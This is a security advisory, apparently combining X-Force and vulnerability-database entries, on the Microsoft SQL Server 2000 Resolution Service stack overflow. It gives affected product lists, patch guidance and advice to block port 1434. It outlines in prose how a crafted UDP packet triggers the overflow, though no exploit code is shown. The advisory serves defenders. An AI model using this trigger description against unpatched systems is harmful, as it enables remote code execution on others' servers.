Use of this information constitutes acceptance for use in an AS IS
condition. There are NO warranties, implied or otherwise, with regard to
this information or its use. Any use of this information is at the
user's risk. In no event shall the author/distributor (Internet Security
Systems X-Force) be held liable for any damages whatsoever arising out
of or in connection with the use or spread of this information.
X-Force PGP Key available on MIT's PGP key server and PGP.com's key server,
as well as at <http://www.iss.net/security_center/sensitive.php>
Please send suggestions, updates, and comments to: X-Force
 of Internet Security Systems, Inc.

    

- Vulnerability information

4577
Microsoft SQL Resolution Service 0x08 Byte Long String Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public, Exploit Commercial

- Vulnerability description

Microsoft SQL Server and Desktop Engine contain a flaw that may allow a remote attacker to execute arbitrary code. The issue is due to the SQL Server Resolution Service not properly sanitizing remote user input. If an attacker sends a specially crafted request (byte set to 0x08 followed by long string and colon), they may be able to overflow a buffer to execute arbitrary code on the system.

- Timeline

2002-07-24 Unknown
2002-07-24 Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- Related references

- Vulnerability author

- Vulnerability information

Microsoft SQL Server 2000 Resolution Service Stack Overflow Vulnerability
Boundary Condition Error 5311
Yes No
2002-07-25 12:00:00 2009-07-11 02:56:00
Vulnerability discovery credited to David Litchfield.

- Affected program versions

Veritas Software Backup Exec for Windows Servers 9.0
Microsoft SQL Server 2000 Desktop Engine
+ Akiva WebBoard 6.1
+ Microsoft Access 2000
+ Microsoft Application Center 2000
+ Microsoft BizTalk Server 2000 Developer Edition
+ Microsoft BizTalk Server 2000 Enterprise Edition
+ Microsoft BizTalk Server 2000 Standard Edition
+ Microsoft BizTalk Server 2002 Developer Edition
+ Microsoft BizTalk Server 2002 Enterprise Edition
+ Microsoft Office 2000
+ Microsoft Project Central Server
+ Microsoft SharePoint Team Services from Microsoft
+ Microsoft Visio 2000 Enterprise Edition
+ Microsoft Visio Enterprise Network Tools
+ Microsoft Visual FoxPro 6.0
+ Microsoft Visual Studio 6.0
+ Microsoft Visual Studio .NET Academic Edition 0
+ Microsoft Visual Studio .NET Enterprise Architect Edition
+ Microsoft Visual Studio .NET Enterprise Developer Edition
+ Microsoft Visual Studio .NET Professional Edition
+ SmartMax Software MailMax 5.0
+ Veritas Software Backup Exec for Windows Servers 9.0
Microsoft SQL Server 2000 SP2
Microsoft SQL Server 2000 SP1
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
Microsoft SQL Server 2000
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0
Microsoft Data Engine 2000
+ Akiva WebBoard 6.1
+ BindView bv-Admin for Microsoft Exchange
+ BindView bv-Admin for Windows 7.0
+ BindView bv-Admin for Windows Migration
+ BindView bv-control for Active Directory 7.0.2
+ BindView bv-Control for Internet Security 7.0.1
+ BindView bv-Control for Microsoft Exchange 7.0
+ BindView bv-Control for Microsoft SQL Server 7.0.1
+ BindView bv-Control for Microsoft SQL Server 7.0
+ BindView bv-Control for Windows 7.0.2
+ CARI-RUSCO Secure Perfect 3.0
+ CCH Equity Compliance Insider Reporting Module
+ Collins Medical Plus 2000
+ Computer Associates Unicenter
+ Computer Associates Unicenter RC/Update 6.1
+ Computer Associates Unicenter RC/Update 6.0
+ CSIRO BioLink Software 1.5
+ DATA.TXT Corporation Time Matters 4.0
+ DATA.TXT Corporation Time Matters 3.0
+ Dell OpenManage IT Assistant 6.0
+ Dell OpenManage IT Assistant 5.0
+ Express Metrix Express Software Manager 6.0.2
+ Express Metrix Express Software Manager 6.0.1
+ Express Metrix Express Software Manager 6.0
+ Express Metrix Express Software Manager 5.0
+ Fluke Networks Optiview Network Inspector 5.0
+ HP Openview Internet Services 4.5
+ HP Openview Internet Services 4.0
+ HP Openview Operations for Windows 7.1
+ HP Openview Operations for Windows 7.0
+ HP Openview Operations for Windows 6.0
+ HP Openview Reporter 3.0
+ HP Openview Reporter 2.0.2
+ ISI Infortel for Windows 5.4
+ ISI Infortel for Windows 5.2
+ ISI Infortel for Windows 5.1
+ ISI Infortel for Windows 4.0
+ Journyx Timesheet 5.0
+ Journyx Timesheet 4.6
+ Journyx Timesheet 4.5 m3
+ Journyx Timesheet 4.5 m2
+ Journyx Timesheet 4.5
+ Journyx Timesheet 2.0
+ Microsoft .NET Framework 1.1
+ Microsoft .NET Framework 1.0 SP1
+ Microsoft .NET Framework 1.0
+ Microsoft .NET Framework SDK 1.0
+ Microsoft Application Center 2000
+ Microsoft Biztalk Server 2002 Partner Edition 0
+ Microsoft FrontPage 2000 Server Extensions SR 1.3
+ Microsoft FrontPage 2000 Server Extensions SR 1.2
+ Microsoft FrontPage 2000 Server Extensions SR 1.1
+ Microsoft FrontPage 2000 Server Extensions SR 1.0
+ Microsoft Great Plains 5.5.1
+ Microsoft Great Plains 7.0
+ Microsoft Great Plains 5.5
+ Microsoft Great Plains 5.0
+ Microsoft Office 2000 SP2
+ Microsoft Office 2000 SP1
+ Microsoft Office 2000
+ Microsoft Office 2000 Chinese Version
+ Microsoft Office 2000 Japanese Version
+ Microsoft Office 2000 Korean Version
+ Microsoft Office XP SP1
+ Microsoft Office XP
+ Microsoft Office XP Developer Edition
+ Microsoft Project Central Server
+ Microsoft SharePoint Portal Server 2001 SP1
+ Microsoft SharePoint Portal Server 2001
+ Microsoft SharePoint Team Services from Microsoft
+ Microsoft SQL Server 2000 SP3
+ Microsoft SQL Server 2000 SP2
+ Microsoft SQL Server 2000 SP1
+ Microsoft SQL Server 2000
+ Microsoft Visio 2000 Enterprise Edition
+ Microsoft Visio Enterprise Network Tools
+ Microsoft Visual FoxPro 7.0 SP1
+ Microsoft Visual FoxPro 7.0
+ Microsoft Visual FoxPro 6.0
+ Microsoft Visual Studio .NET Academic Edition 0
+ Microsoft Visual Studio .NET Enterprise Architect Edition
+ Microsoft Visual Studio .NET Enterprise Developer Edition
+ Microsoft Visual Studio .NET Professional Edition
+ Microsoft Visual Studio .NET Trial Edition 0
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows XP Embedded SP1
+ Microsoft Windows XP Embedded
+ MIP NonProfit Series Pro 4.5
+ MIP NonProfit Series Pro 4.4
+ MIP NonProfit Series Pro 4.3
+ NetSupport NetSupport TCO 4.5.1
+ NetSupport NetSupport TCO 4.5
+ Network Associates SupportMagic SQL 4.5
+ Okena StormWatch
+ Peachtree Software Timeslips 11.0
+ Peachtree Software Timeslips 10.0
+ Peachtree Software Timeslips 9.0
+ Peachtree Software Timeslips 8.0
+ Peachtree Software Timeslips 7.0
+ Peachtree Software Timeslips 6.0
+ QiNetix CommVault Galaxy 4.0.1
+ SalesLogix Corporation SalesLogix 2000.0
+ SmartMax Software MailMax 5.0
+ TeleStream FlipFactory 3.0
+ TeleStream FlipFactory 2.0
+ TeleStream FlipFactory 1.2
+ Veritas Software Backup Exec for Windows Servers 9.0
+ VIGILANTe SecureScan NX 2.5
+ Visionary Systems Firehouse Software 5.4
+ Visionary Systems Firehouse Software 5.0.2 5
+ Visionary Systems Firehouse Software 5.0
+ Visionary Systems Firehouse Software 3.0.5
+ Wonderware InTouch 7.11
+ Xerox CentreWare Web 1.0

- Unaffected program versions

Microsoft SQL Server 2000 SP3a
Microsoft SQL Server 2000 SP3

- Vulnerability discussion

A vulnerability has been discovered in Microsoft SQL Server 2000 that could make it possible for remote attackers to gain access to target hosts.

A problem in the SQL Server Resolution Service makes it possible for a remote user to execute arbitrary code on a vulnerable host. An attacker could exploit a stack-based overflow in the resolution service by sending a maliciously crafted UDP packet to port 1434.

It has been reported that a vulnerable version of MSDE 2000 is automatically installed with Internet Explorer 6 on .NET servers.

***UPDATE:

A worm that may exploit this vulnerability has been detected in the wild.

Administrators are advised to block all external access to database servers until more information is available. Access to TCP and UDP port 1434 should be denied completely. Additionally, implementing filter rules for other ports may also decrease the chances of compromise through as yet unknown avenues. This should be done even if the patch for this particular vulnerability has been installed.

Cisco has released an advisory that details workaround information. Microsoft recommends that affected users apply SQL Server 2000 Service Pack 3.

BlackBoard 5.5.1 Level 3 users can apply SQL Server 2000 Service Pack 3. Users are advised to contact BlackBoard for further information.

- Exploit

An exploit has been released as part of the MetaSploit Framework 2.0.

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

Exploit code available:

- Solution

Prior to installing the fixes, administrators are advised to ensure that all SQL Server processes are inactive. Ensure that all installations of SQL Server are patched, and reboot the system before restarting SQL Server.

Veritas Software Backup Exec 9.0 ships with some MSDE components and may therefore be prone to this vulnerability. Users are advised to apply the Microsoft fixes to address this vulnerability for Backup Exec.

Microsoft has released SQL Server 2000 SP3a, which contains all of the fixes from SP3. This service pack also allows users to disable netlibs so that SQL Server 2000 will not listen on port 1434. SP3a is directed at users who have not already installed SP3 or wish to disable the netlibs. Please see the SQL Server Homepage for further details.

A specific fix has been released for the Microsoft .NET Framework SDK. See the References section for a link to Microsoft Knowledge Base article 813850 for instructions and download information.

Fixes available:

Microsoft SQL Server 2000
Microsoft Data Engine 2000
Microsoft SQL Server 2000 SP1
Microsoft SQL Server 2000 Desktop Engine
Microsoft SQL Server 2000 SP2

- References
